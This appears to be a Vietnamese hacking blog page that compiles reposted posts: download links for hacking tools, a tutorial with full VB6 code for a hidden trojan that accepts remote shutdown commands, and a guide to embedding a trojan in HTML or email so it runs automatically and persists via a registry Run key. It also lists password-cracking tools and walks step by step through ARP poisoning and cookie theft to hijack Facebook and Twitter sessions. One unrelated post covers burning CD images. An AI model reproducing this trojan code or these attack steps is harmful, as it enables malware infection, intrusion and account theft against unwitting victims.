Chào mừng đến với site của Bee! Chúc các bạn có những giây phút thực sự vui vẻ!!!

Thứ Sáu, 30 tháng 11, 2012

Một vài Tool Hack hay


1.Tool Scan link admin 
Download Now

2.Tool SQL Injection ProSQLExec v0.5final 

http://rapidshare.com/files/181177873/prosql0.5.rar

3.Tool SQL Injection Helper 

http://rapidshare.de/files/40875064/...Video.rar.html

4.XSS Scanner v1.0 

http://www.4shared.com/file/81088771...ghiit_com.html

5. Tool hack lỗi SQL Injection "đa năng cho hacker" 

Video: http://www.vimeo.com/1536040?pg=embed&sec=1536040
Download: https://labs.portcullis.co.uk/downlo...Setup-0909.exe


nguồn: webso.vn

Viết trojan 1 cách đơn giản


Viết một Trojan dễ dàng hơn nhiều so với mọi người nghĩ. Tất cả thực sự chỉ cần hai chương trình ứng dụng đơn giản với nội dung ít hơn 100 dòng mã lệnh.

Chương trình đầu tiên là client, là chương trình cho người sử dụng biết. Chương trình thứ hai là server, hay phần “trojan” thực.


Bây giờ chúng ta sẽ xem chúng ta cần gì cho cả hai và một số ví dụ mẫu.

Server

Server là phần Trojan của chương trình. Nó cần phải được giấu để người dùng bình thường không thể tìm thấy nó.
Để thực hiện điều này bạn bắt đầu bằng cách sử dụng đoạn mã lệnh sau:
 
Code:
Private Sub Form_Load() Me.Visible = False End Sub
Đoạn mã này làm cho chương trình không thể thấy được bằng mắt thường nhưng có thể bị phát hiện trong Task Manager của Windows vì thế nếu muốn chương trình ẩn tốt hơn, chúng ta có thể viết đoạn mã như sau:
 
Code:
Private Sub Form_Load() Me.Visible = False App.TaskVisible = False End Sub

(Trong hệ điều hành Windows, tất cả chương trình có đuôi .exe đều được thể hiện trong danh sách chương trình chạy. Tuy nhiên chương trình của bạn sẽ được ẩn trong Running Applications List )

Bây giờ chúng ta đã có một chương trình tàng hình đối với người sử dụng bình thường, mà chỉ cần có bốn dòng lệnh. Tuy nhiên nó vẫn còn quá đơn giản, chúng ta có thể làm cho nó tốt hơn bằng cách thêm vào một số hàm.

Đầu tiên là làm sao cho nó có thể “nghe” được các kết nối khi nó xâm nhập được vào máy, chúng ta cần thêm vào một điều khiển Winsock Control.

Tôi đặt tên cho điều khiển của tôi là “win”. Còn các bạn có thể đặt là bất cứ cái gì tuỳ ý.

Để làm cho Trojan "nghe" được cổng 2999 khi khởi động, chúng ta viết đoạn mã như sau:
 
Code:
Private Sub Form_Load() Me.Visible = False App.TaskVisible = False win.LocalPort = 2999 win.RemotePort = 455 win.Listen End Sub

Đoạn mã này thiết lập một cổng mở cục bộ tới cổng 2999, và cổng mà nó gửi tới là 445.

Bây giờ, chương trình đã có thể “nghe”, nhưng chưa làm được điều gì rõ ràng cả.

Chúng ta thêm đoạn mã sau vào form chính:
 
Code:
Private Sub win_ConnectionRequest(ByVal requestID As Long) win.Close win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long) win.GetData GotDat DoActions (GotDat) End Sub

Tiếp theo, chúng ta sẽ viết hàm DoActions như là một chương trình con để gọi vào main form. Đoạn mã trên thực hiện hai nhiệm vụ: Đầu tiên là làm cho tất cả các yêu cầu kết nối được tự động chấp nhận; tiếp đó là làm cho tất cả các dữ liệu được tự động chấp nhận và sau đó thì chuyển toàn bộ dữ liệu này sang cho hàm DoActions mà chúng ta sẽ viết dưới đây.

Hàm DoActions nên viết ở dạng public để các chương trình ở ngoài modul cũng có thể dùng được. Thêm đoạn mã sau vào modul, và chúng ta đang làm việc với server của Trojan:
 
Code:
Public Function DoActions(x As String) Select Case x Case "msgbox" Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error" Case "shutdown" shell "shutdown -s -f -t 00" End Select End Function
Bây giờ bạn đã có một chương trình mà khi dữ liệu “Msgbox” được gửi tới cổng 2999, nó sẽ thể hiện một hộp tin nhắn msgbox trên máy tính của nạn nhân. Khi dữ liệu “shutdown” được gửi tới cổng 2999, nó sẽ tắt máy tính của nạn nhân. Tôi dùng câu lệnh “Select Case” để dễ dàng chỉnh sửa đoạn mã về sau này. Xin chúc mừng, bạn vừa mới viết xong Trojan đầu tiên của bạn. Bây giờ chúng ta hãy xem lại đoạn mã hoàn chỉnh.
 
Code:
Main Form Private Sub Form_Load() Me.Visible = False App.TaskVisible = False win.LocalPort = 2999 win.RemotePort = 455 win.Listen End Sub Pivate Sub win_ConnectionRequest(ByVal requestID As Long) win.Close win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long) win.GetData GotDat DoActions (GotDat) End Sub
Hãy nhớ thêm điều khiển winsock và đặt tên nó là “win” nếu bạn dùng đoạn mã này:
 
Code:
Module Public Function DoActions(x As String) Select Case x Case "msgbox" Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error" Case "shutdown" shell "shutdown -s -f -t 00" End Select End Function

Tất cả phần Server của Trojan chỉ có thể. Giờ chúng ta xem xét đến phần Client.

Client

Client là cái mà bạn sẽ tương tác tới. Bạn sẽ dùng nó để kết nối tới server từ xa (trojan) và gửi cho nó các lệnh. Sau khi đã viết được phần server chấp nhận câu lệnh “shutdown”, “msgbox”, chúng ta hãy tạo ra một client gửi đi các câu lệnh đó.

Tạo một form thêm một điều khiển Winsock Control, một hộp text box và bốn nút. Trong đoạn mã dưới hộp text box được đặt tên là txtIP, các nút được đặt tên là cmdConnect, cmdMsgbox, cmdShutdown và cmdDisconnect. Đoạn mã như sau:
 
Code:
Private Sub cmdConnect_Click() IpAddy = txtIp.Text Win.Close Win.RemotePort = 2999 Win.RemoteHost = IpAddy Win.LocalPort = 9999 Win.Connect cmdConnect.Enabled = False End Sub Private Sub cmdDisconnect_Click() Win.Close cmdConnect.Enabled = True End Sub Private Sub cmdMsgbox_Click() Win.SendData "msgbox" End Sub Private Sub cmdShutdown_Click() Win.SendData "shutdown" End Sub
Đó là đoạn mã cho client. Tất cả việc nó làm là lấy địa chỉ IP từ txtIP và kết nối với cổng từ xa 2999. Sau khi được kết nối, bạn có thể gửi dữ liệu “shutdown” hay “msgbox” tới server và các hoạt động tương ứng sẽ được thực hiện (tắt máy tính hay thể hiện một hộp tin nhắn).

Hai chương trình này làm được rất ít nhưng có thể cải tiến nhanh thành một chức năng quản trị từ xa mạnh nếu bạn biết bạn đang làm gì. Tôi đề nghị là nên cố gắng thêm các loại điều khiển lỗi và hàm cho cả client và server.

Lời khuyên

Hãy làm cho server có thể tải được một file đặc tả của người tấn công.

Thêm mã lệnh để Server được thực thi lúc khởi động (là một khoá thanh ghi).

Và một keylogger cho server – làm cho nó gửi thông tin cho người tấn công.

Kĩ thuật gắn Trojan vào file HTML


Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩ nhiên là được rồi! Hôm nay mình sẽ giới thiệu các bạn về vấn đề!


1) Hướng dẫn:

· Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file
trojan.exe để xài!

· Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex

· Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùng EditPlus, nó rất
hay!) để sửa file temp.htm như sau:

Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...”

· Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác!



2) Mã nguồn:



· Files:

§ tempsrc.hta dùng để extract và execute trojan.exe

§ tempsrc.htm file htm chính

§ convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex



· Những vấn đề chính:



§ Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe

Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau:



Kí tự
L
P
T
V

C
l
u
b

2
0
0
1

Mã ANSI ở hệ 10
76
80
84
86
32
67
108
117
98
32
50
48
48
49

Mã ANSI ở hệ 16
4C
50
54
56
20
43
6C
75
62
20
32
30
30
31




Encode16 Decode16

“LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001”



‘--- VBScript Code ---



function encode16(st)

for i = 1 to len(st)

temp = hex((asc(mid(st,i,1)))

‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i

‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này

‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự

if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ...

temp =”0” & temp

end if

encode16 = encode16 & temp

next

end function



function decode16(st)

for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2

decode16 = decode16 & chr(“&h” & mid(st,i,2))

‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi

‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16

next

end function

‘--- VBScript Code ---



§ Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm



ü Mục đích:

+ giảm kích thước file

+ làm cho mã lệnh khó đọc đối với người khác



ü Ví dụ: thay vì viết lệnh rõ ràng:



on error resume next

dn=chr(34)

xd=vbcrlf

set wsh=createobject("wscript.shell")

set fso=createobject("scripting.filesystemobject")



Chúng ta cũng có thể viết lại như sau:



on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")



Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không?



3) Hỏi/Đáp:



· Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không?



Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn!



· Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ?



· Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không?



Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe!

...

wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\ Run\Kernel 32”,filetrojan

...



Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip



· Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không?



Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến!



Chúc các bạn thành công!

nguồn: webso.vn

10 công cụ dùng để crack password hay nhất

1. Cain & Abel – Công cụ dùng để lấy Password trên Windows hiệu quả nhất. 




Trên hệ thống UNIX thường dùng các tài nguyên miễn phí còn trên nền tảng Windows thì thường không phải như vậy. Trên nền tảng Windows có nhiều Tools cho phép Crack password nhưng rất ít tools cho phép tóm các gói tin trên mạng giải mã ngược lại để lấy được Password mong muốn. Cain & Abel là một tools vừa có thể Crack Password trên windows khi ngồi tại máy tính hay có thể tóm các gói tin trên mạng và giải mã ngược lại sử dụng: Dictionary và Bruforce Attack. 
Ngoài ra Cain & Abel còn nằm trong số các phần mềm Sniffer. 

2. John the Ripper 



Là một công cụ có tính tùy biến rất cao, hỗ trợ cho nhiều nền tảng hệ điều hành và Crack Password rất nhanh. Hỗ trợ từ môi trường UNIX, Linux, DOS, Win32,…Và là một Tools rất hiệu quả để crack những Password dễ trên hệ thống UNIX. Tools này hỗ trợ nhiều phương thức mã hóa khác nhau thường tìm thấy trên hệ thống UNIX như Kerberos AFS và phương thức mã hóa trên Windows NT/2000/XP LM hashes. 

3. THC Hydra 



Một tools để crack những phương thức xác thực và hỗ trợ nhiều dịch vụ khác nhau 
Nếu bạn muốn tấn công sử dụng phương thức Brute Force để tấn công tới một dịch vụ “Remote Authentication Service” thì Hydra là một lựa chọn tốt nhất. Nó có thể thực hiện tấn công dựa vào Dictionary Attack, thực hiện tấn công hơn 30 giao thức khác nhau bao gồm: Telnet, ftp, http, https, smb, và một vài giao thức của cơ sở dữ liệu khác. 

4. Aircrack 



Một công cụ tấn bẻ khóa WEP/WPA nhanh nhất. 

Aircack hỗ trợ các chuẩn không giây 802.11a/b/g và dùng để Crack WEP và WPA. Nó có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512-bits và đủ cho giải mã hầu hết các gói tin trên mạng Wireless. Ngoài ra công cụ này còn hỗ trợ để bẻ khóa WPA1 và WPA2 bằng phương thức Brute Force Attack. Nó có thể hoạt động với: aircrack để crack các key mã hóa trên WEP và WPA-PSK, ngoài ra với airdecap chúng có khả năng giải mã các file được mã hóa bởi WEP và WPA. 

5. L0phtcrack
 



Một tools kiểm tra các thiết lập password và crack password của Windows. 

L0phtCrack, cũng hỗ trợ các phương thức mã hóa theo chuẩn LC5, khi thực hiện crack Password Windows được mã hóa khi ở trạng thái stand-alone hay đã join vào Domain, và là một công cụ để Crack password trên Active Directory. Nó cũng có khả năng sniffer trên mạng LAN. Nó có một vài phương thức để sinh ra các password để thử bằng phương thức (dictionary, brute force, etc). Ngoài tools này bạn có thể sử dụng những tools hiệu quả hơn như Cain & Abel, John the Ripper, hay Ophcack. 

6. Airsnort
 



Một công cụ để Crack mã hóa WEP của mạng Wireless. 

Airsnort là một công cụ có khả năng recovery key từ các gói tin truyền trên mạng WLAN. Được phát triển bởi Shmoo Group và được thực hiện thử độ khó và những nguy cơ tấn công vào mạng WLAN, ngoài tools này bạn có thể sử dụng tools Aircrack một công cụ hiệu quả hơn. 

7. SolarWinds
 



Tool này cho phép scan mạng, giám sát và là một công cụ để tấn công. 

SolarWinds được tạo ra với hàng tá các tác dụng. Với tính năng được giới thiệu như một công cụ để Scan và phát hiện các máy tính đang active trên mạng, là một công cụ tấn công hiệu quả giao thức SNMP bằng phương thức Brute-force attack, hay giải các mã hóa trên Router, là một công cụ hiệu quả nhất để cấu hình Router và các ứng dụng khác. 

8. Pwdump. 



Một công cụ recovery password trên Windows rất hiệu quả. 
Pwdump cho phép extract file SAM trong Windows, hỗ trợ lấy các thông tin User, password đã được mã hóa. Ngoài tác dụng crack password mã hóa trong file SAM, nó còn có khả năng giải mã khi đặt syskey. Một lựa trọn tương tự bạn có thể sử dụng L0phtcrack cũng tương tự và hiệu quả hơn. 

9. RainbowCrack. 


Một tools dùng để crack password đã được mã hóa 

Sử dụng có thể chiếm hết tài nguyên bộ nhớ để đánh đổi cho tính hiệu quả và giảm thiểu thời gian crack Password. 

10. Brutus 



Một công cụ dùng để tấn công các giao thức xác thực trên mạng. 
Nó chỉ có khả năng tấn công chống lại các dịch vụ trên Windows bằng cách đoán mật khẩu đăng nhập từ các từ điển khác nhau. Chúng hỗ trợ rất nhiều giao thức nhuw: HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, và nhiều hơn nữa. Để tấn công các giao thức xác thực trên UNIX bạn có thể sử dụng THC Hydra.

Nguồn: HVA

Ghi 4Gb lên đĩa CD


CD Image GUI Beta 3

Software này sẽ cho phép các bạn một image file dạng ISO của dĩa CD từ nguồn là harddrive.Tiếp sau đó bạn dùng bất cứ chương trình burn nào có hổ trợ ghi ISO (như NERO BurnningROM chẳng hạn) để ghi ra dĩa CD.

Ta cũng biết bảng phân phối tập tin nằm ở vị trí đầu đĩa chứa tất cả thông tin về cấu trúc tập tin và thư mục trên đĩa, bây giờ giả sử nếu có hai (hoặc nhiều hơn) mục nhập (entry) cùng trỏ đến một nội dung trên đĩa (nghĩa là chứa cùng địa chỉ ) thì khi xem đĩa bằng chương trình quản lý tập tin kiểu Windows Explorer ta sẽ thấy có hai tập tin nằm ở hai thư mục khác nhau, nhưng thật ra đĩa chỉ chứa một tập tin duy nhất. Như vậy, nếu ta có thể can thiệp vào bảng phân phối tập tin này thì việc lưu trữ 10 tập tin 600MB giống nhau trên đĩa CD chỉ là chuyện... nhỏ.

Và việc sử dụng phần mềm CDImage GUI với tùy chọn “-o optimize storage by encoding duplicate files only once” chính là giải pháp. Trước tiên bạn phải chép tất cả tập tin và thư mục muốn đưa lên đĩa CD vào một thư mục nào đó trên đĩa cứng. Tiếp đến, bạn chạy chương trình CDImage GUI.

Mục StartUp:

- Thẻ Directories: bạn nhập đường dẫn đến thư mục chứa bộ nguồn (Ví dụ: D:\Download\TuoitreOnline) và đường dẫn kèm tên tập tin hình ảnh ISO sẽ được tạo ra (Ví dụ: C:\Download\TuoitreOnline.iso) vào ô Please specify the Root Dir of your CD và Please specify a Path and Filename for the Iso File, hoặc cũng có thể nhấp vào nút rồi chọn đến từng vị trí tương ứng.

- Thẻ Config:

+ Chọn Use internal CdImage (V.2.47) nếu muốn dùng chương trình CdImage được tích hợp sẵn trong phần mềm.

+ Chọn Use external CdImage nếu muốn sử dụng chương trình CdImage của riêng bạn, khi chọn tùy chọn này bạn sẽ phải nhập đường dẫn đến tập tin cdimage.exe vào trong ô Select your CDImage.Exe.

Tại thẻ này, bạn có thể đánh dấu chọn mục Save your Settings on Exit để chương trình tự động lưu lại những thay đổi của bạn nhằm áp dụng cho lần chạy sau.

Mục Configuration:

- Thẻ Files:

+ “-t time stamp for all files and directories, no spaces, any delimiter”: cập nhật ngày tháng tạo tập tin và thư mục cho toàn bộ nội dung đĩa dựa vào ngày tháng bạn nhập trong ô bên dưới, theo dạng [ tháng/ngày/năm, giờ : phút : giây ].

+ “-g encode GMT time for files rather than local time”: mã hóa dạng ngày giờ tại máy tính cục bộ theo dạng GMT.

+ “-h include hidden files and directories”: đưa tất cả tập tin và thư mục ẩn có trong thư mục bộ nguồn vào luôn trong tập tin hình ảnh ISO.

- Thẻ FileSystem:

+ “-n allow long filenames (longer than DOS 8.3 names)”: giữ lại cấu trúc tên tập tin theo dạng dài, nếu không chọn tùy chọn này thì tất cả tên tập tin trong hình ảnh ISO sẽ bị chuyển thành dạng 8.3 như của DOS.

+ “-nt allow long filenames, restricted to NT 3.51 compatibility”: giữ tên tập tin dài theo chuẩn của Windows NT 3.51.

+ “-d don’t force lowercase filenames to uppercase”: không tự động chuyển tên tập tin chữ thường thành chữ hoa.

- Thẻ Boot: nếu bạn muốn đĩa CD có thể khởi động được thì hãy đánh dấu vào “-b “El Torito” boot sector file, no spaces” rồi nhập đường dẫn đến tập tin .BIN có chứa vùng khởi động vào ô bên dưới, bạn cũng có thể nhấn nút rồi tìm đến tập tin tương ứng.

- Thẻ Signature / CRC:

+ “-o optimize storage by encoding duplicate files only once”: tối ưu hóa dung lượng đĩa bằng cách tìm những tập tin giống nhau trong bộ nguồn rồi thay đổi địa chỉ của các mục nhập trên bảng phân phối tập tin để chúng cùng trỏ đến một tập tin duy nhất.

+ “-os show duplicate files while creating image”: hiển thị các tập tin trùng nhau khi tạo tập tin hình ảnh ISO.

- Thẻ Report:

+ “-w1 report non-ISO or non-Joliet compliant filenames or depth”: báo cáo cấp độ sâu hoặc tên những tập tin không theo chuẩn ISO hay Joliet.

+ “-w2 report non-DOS compliant filenames”: báo cáo những tập tin có tên không theo chuẩn DOS.

+ “-w3 report zero-length files”: báo cáo những tập tin có kích thước bằng 0.


Thẻ Creation
- Thẻ Creation:

+ “-m ignore maximum image size of 681,984,000 bytes”: cho phép tạo ra tập tin hình ảnh ISO lớn hơn 681MB.

+ “-l volume label, no spaces (e.g. –lMYLABEL)”: tạo nhãn cho đĩa CD.

Mục Creation: sau khi bạn nhấn nút Start Image Creation, chương trình bắt đầu đọc thư mục chứa bộ nguồn trên đĩa cứng, phân tích các tập tin trong ấy rồi dựa vào những tùy chọn trong Configuration để tạo ra tập tin hình ảnh ISO.

Và còn tuyệt vời hơn nữa : đây là freeware với dung lượng "bé hạt tiêu" chỉ 640KB, tương thích với mọi Windows, bấm vào link dưới đây để download chương trình.

http://www.tuoitre.com.vn/media/download/cdimagegui.zip

Hoặc bạn cũng có thể download tại :

http://www.echip.com.vn/echiproot/Softwares/2004/cdimagegui.zip

Chúc các bạn enjoy.Thân mến.
Nguồn: webso.vn

Hack tài khoản Facebook, Twitter


Trong bài viết này chúng tôi sẽ hướng dẫn cách hack một tài khoản facebook, Twitter,… bằng kỹ thuật HTTP Session Sidejacking qua mạng LAN hoặc mạng WIFI .
Session Sidejacking là gì ? 
Phương pháp chủ yếu là sử dụng gói tin nguồn-định tuyến IP (source-routed IP packets). Điều này cho phép hacker đứng tại điểm A trên mạng có thể tham gia vào cuộc trò chuyện giữa B và C (kiểu man-in-middle attack ) bằng cách khuyến khích các gói tin IP đi qua máy của mình.
Session Sidejacking là kiểu tấn công thuộc họ man-in-middle attack (MITM), mục đích là nghe lén đường truyền giữa người dùng và các máy chủ dịch vụ bằng các công cụ sniff rồi đánh cắp các dữ liệu quan trọng liên quan tới phiên làm việc của người dùng, rồi phục dựng phiên làm việc này trên một máy tính thứ 3.
Trong khoa học máy tính, việc cướp quyền đăng nhập thông qua một máy tính hợp lệ được thực hiện rất đơn giản thông qua việc sử dụng cookie. Kẻ tấn công có thể thực hiện bằng cách dùng một máy tính trung gian và ăn trộm cookie được lưu trên máy tính của nạn nhân và thực hiện kế hoạch phá hoại của mình.
Mô tả quá trình tấn công:
  • Bước 1: Kết nối vào mạng wifi hoặc mạng LAN của nạn nhân
  • Bước 2: Thực hiện ARP Poison Routing, bước này nằm giúp bạn có thể biến máy tính của bạn trở thành một router giả danh nhằm mục đích  nghe lén dữ liệu được trung chuyển trên toàn mạng.
  • Bước 3: Sniff tất cả dữ liệu trung chuyển trên mạng wifi sau khi mạng này đã bị ARP Poison Routing thông qua công cụ Wireshark 
  • Bước 4: Lọc ra dữ liệu đến từ người dùng cụ thể, ví dụ một người dùng có IP là: 192.168.1. và bóc tách dữ liệu cookie của người dùng 
  • Bước 5: Thực hiện cookie injection, nhằm chèn dữ liệu về cookie vào trình duyệt của người tấn công 
  • Bước 6: Khôi phục hoàn toàn phiên truy cập web của người dùng trên máy tính của người tấn công

     
Tấn công HTTP Session Sidejacking 
Các công cụ cần thiết:
1.     Wireshark (tải về tại đây)
2.     Cain and Abel (tải về tại đây)
3.     Trình duyệt Mozilla Firefox (Bắt buộc) và Mozilla Addons (Grease Monkey) (tải về tại đây)
4.     Cookie Injector (tải về tại đây)
Thực hiện:
Kết nối vào mạng LAN hoặc Wifi
Bước 1: Cài đặt Wireshark, Cain and Abel, Grease Monkey, Cookie Injector.
Bước này bạn thực hiện cài đặt bình thường như những phần mềm khác, với chú ý yêu cầu chạy dưới quyền administrator và cho phép cài đặt Winpcap.
Cài đặt Cookie Injection, bạn chỉ cần kéo thả file Cookieinjector.user.js vào giao diện của Firefox như hình vẽ.
Bước 2: Bật Wireshark vào menu Capture / Interfaces (Ctrl + I). Chọn card mạng của bạn và nhấnStart để bắt đầu quá trình chụp gói tin (capture packets) qua mạng.
Bạn sẽ thấy các gói tin hiện ra ào ào, trong đó bạn chú ý:
  • Source: Địa chỉ nguồn, nơi chứa tất cả các địa chỉ mà gói tin xuất phát, bao gồm cả địa chỉ của nạn nhân bị tấn công
  • Destination: Địa chỉ đích, nơi chứa địa chỉ mà gói tin sẽ tới.
Bước 3: Chạy Cain&Abel, vào menu configure chọn card mạng (chọn cái nào hiện tại có địa chỉ IP) và cấu hình như hình dưới.
 Chuyển đến tab Sniffer ( trong dãy các tab nằm phía trên ). Click bật biểu tượng Sniffer ( hình card mạng)
Nhấp vào biểu tượng hình dấu + màu xanh, chọn OK để thực hiện quá trình scan địa chỉ MAC và Ip trong mạng.
Bước 4: Sau khi có danh sách các máy tính hiện đang kết nối trong mạng wifi, ta tiến tới thực hiện ARP Poison Routing.
Bạn chuyển qua tab APR ( nằm ở dãy tab phía dưới màn hình – biểu tượng màu vàng và đen ). Click vào dấu cộng “+” ( chỗ khoanh tròn trong hình ) để mở hộp cấu hình ARP Poison Routing như sau:
Việc ARP Poison Routing sẽ được thực hiện giữa máy tính bên trái và “các” máy tính bên phải. Bên trái có thể là router như trường hợp địa chỉ 192.168.1.1 trong hình ( các router thường có địa chỉ là x.x.x.1) và bên phải là tất cả các máy tính có trong mạng ở phía bên. Xong xuôi, click OK.
Bước 5:  Click chọn biểu tượng Start/Stop APR ( màu vàng và đen ) nằm ở trên bên trái của cửa sổ Cain&Abel
 Sau khi click sẽ thấy các dòng idle trước các địa chỉ IP sẽ đổi thành Poisoning. Bây giờ ta đã có đầy đủ điều kiện để sniff toàn bộ gói tin trong mạng này.
Bước 6: Chuyển sang tab Passwords, ta sẽ thấy một vài điều thú vị ở đây.
Bạn chú ý tiếp tới cột URL, danh sách này sẽ liên tục được cập nhật, mỗi khi người dùng trong mạng wifi truy cập một website nào đó, Cain&Abel sẽ ghi lại chi tiết: người dùng có IP nào truy cập website nào, URL là gì, địa chỉ IP của website, username & password (nếu có).
 Bạn cứ liên tục theo dõi danh sách này, đến khi nào xuất hiện địa chỉ web bạn mong muốn. Ví dụ: http://www.facebook.com/*****  và chú ý tới một số thông tin sau:
  • IP của HTTP Server: đây chính là IP của facebook
  • IP của client: đây chính là IP của người dùng đang truy cập facebook
Ngay lập tức bạn hãy chuyển trở lại Wireshark, click nút stop trên thanh công cụ.
Trong ô Filter bạn gõ: http.cookie contains datr
Sau đó thực hiện việc lấy Cookie bằng cách, chọn địa chỉ IP trong mục Source trùng với IP của client mà bạn đã ghi nhớ bên Cain&Abel (trong hình là 192.168.1.6)
Chuột phải vào đó, chọn Copy / Bytes / Printable Text Only.
Lúc này Cookies của nạn nhân mà bạn lấy được đã được lưu vào bộ nhớ đệm của máy tính.
Bước 7: Phục dựng Session – Cookie injection
Trước hết, bạn mở Firefox và truy cập vào địa chỉ http://www.facebook.com
Chú ý: Ban phải logout ra khỏi tài khoản facebook hiện tại.
Bây giờ thì bấm tổ hợp phím Alt+C ( phím Alt và phím C đồng thời ), nó sẽ hiện ra cái khung nhỏ nhỏ như trong hình dưới (Wireshark Cookie Dump). Bạn paste cái chuỗi cookies đã copy ở bước trên vào ô textbox của cái khung nhỏ nhỏ này rồi bấm Ok. (Với chú ý add-on Grease Monkey đã được Enable)
Sau khi nhấn OK, hộp thoại thông báo quá trình ghi nhớ Cookies thành công
Click vào thanh address và nhấn Enter để trang được load lại. Và đây là thành quả của chúng ta.

Các phương thức bảo mật
Khởi nguồn của vấn đề ARP Poisoning Routing ( APR), là việc các thiết bị trong mạng LAN không biết địa chỉ IP nào hiện đang được gán cho thiết bị có địa chỉ MAC nào. Như ta đã biết, địa chỉ MAC là duy nhất đối với mỗi thiết bị mạng.
Các thiết bị trong mạng LAN khi cần biết địa chỉ IP của nhau thì chúng cần kiểm tra trong bộ nhớ của chúng (bảng ARP) nếu không thấy chúng sẽ gửi đi một gói tin broadcast ARP Request. Khi này thiết bị nào hiện có IP là 192.168.1.1 phản hồi trở lại với cái thiết bị vừa hỏi kia rằng nó hiện đang sở hữu IP 192.168.1.1 và địa chỉ MAC của nó.
Vấn đề rắc rối phát sinh từ chỗ các client con không có cách nào để kiểm tra xem địa chỉ IP 192.168.1.1 của thiết bị kia có phải là thật không. Nên lúc này nếu có một thiết bị giả mạo nào đó, đưa ra nhiều gói tin chứng tỏ nó có địa chỉ 192.168.1.1 hơn thì client sẽ nghe theo và gửi gói tin qua cho nó ( ARP Reply flood ).
Vậy trong trường hợp này, chúng tôi đưa ra cho bạn 2 giải pháp:
  1. Sử dụng giao thức HTTPS để truy cập các trang web
    Việc này sẽ giúp gói tin của bạn được mã hóa trước khi gửi đi, nhằm tránh việc nghe lén trong mạng.
     
  2. Gán địa chỉ IP tĩnh và áp dụng Static ARP
Điều này giống như bạn ghi tên mình vào sổ danh bạ của router, tức là bạn sẽ luôn luôn biết được địa chỉ 192.168.1.1 ở đâu, và gửi thẳng dữ liệu tới đó, tránh được việc gửi nhầm gói tin tới các địa chỉ mạo danh.
Trước hết bạn đặt địa chỉ IP tĩnh cho máy tính của mình, sau đó vào Command Dos và thực hiện câu lệnh sau:
arp –s X.X.X.X Y.Y.Y.Y
Trong đó:
  • X.X.X.X là địa chỉ IP tĩnh mà bạn vừa gán cho máy tính của mình
  • Y.Y.Y.Y là địa chỉ MAC của máy tính của bạn.

 Chúc các bạn thành công!
Nguồn: techz.v
n

Tấn công ARP spoofing trong mạng LAN và cách phòng chống

Kỹ thuật tấn công Address Resolution Protocol (ARP) spoofing hay còn gọi là ARP flooding, ARP poisoning hay ARP Poison Routing (APR). Đó là cách tấn công từ một máy tính trong mạng LAN, thông qua giao thức ARP và địa chỉ MAC, IP, nó nhằm ngắt kết nối từ một hay một số máy tính với Modem, dẫn đến tình trạng các máy tính đó không thể truy cập Internet.
Máy tính nạn nhân mất kết nối Internet nhưng vẫn có kết nối mạng LAN nên khi bạn ping đến máy nạn nhân vẫn có kết quả.

Sau đây tôi sẽ nói 2 cách để thực hiện cuộc tấn công này từ máy tính của bạn. 
>>> Cách đơn giản nhất là sử dụng phần mềm NetCut v2.

